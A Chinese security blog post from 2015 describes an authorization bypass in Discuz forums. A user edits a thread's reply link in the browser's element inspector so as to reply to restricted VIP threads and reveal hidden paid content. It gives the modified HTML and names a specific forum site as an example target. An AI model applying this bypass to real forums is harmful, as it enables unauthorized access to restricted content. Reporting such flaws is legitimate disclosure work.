最新文章:
- Google Map api国内正常使用该如何配置(2021最新)
- wordpress国内网速慢加速及防DDOS攻击快速CF切换教程
- 2.18-3.31,共战疫情,阿里云免费送.网址域名
- Ubuntu安装时出现“failed to load ldlinux.c32”
- iconv函数报错 Detected an illegal character in input string
首页 信息安全
Discuz的一处越权操作 强制回复无权限帖子
发布时间:2015年05月26日 评论数:抢沙发 阅读数:34493
-
我们先注册账号
随便找一处vip教程
接下来 我们审查元素
找到这段代码
然后修改
<a href="http://xxx.xxx.xxx/forum.php?mod=post&action=reply&fid=170&tid=9310" onclick="showWindow('reply', this.href)">回复</a>
xxx.xxxx.xx代表该论坛的网址
合购vip 就用
<a href="http://www.hegouvip.com/forum.php?mod=post&action=reply&fid=170&tid=9310" onclick="showWindow('reply', this.href)">回复</a>
接着 我们再点回复
然后就可以获取特定用户群才能回复且必须回复才能获得隐藏内容的内容了
漏洞证明:
本文作者:Mr.linus
文章标题: Discuz的一处越权操作 强制回复无权限帖子
本文地址:http://www.90qj.com/113.html 本文已经被百度收录,点击查看详情
版权声明:若无注明,本文皆为“挨踢 Blog”原创,转载请保留文章出处。
本文地址:http://www.90qj.com/113.html 本文已经被百度收录,点击查看详情
版权声明:若无注明,本文皆为“挨踢 Blog”原创,转载请保留文章出处。
相关文章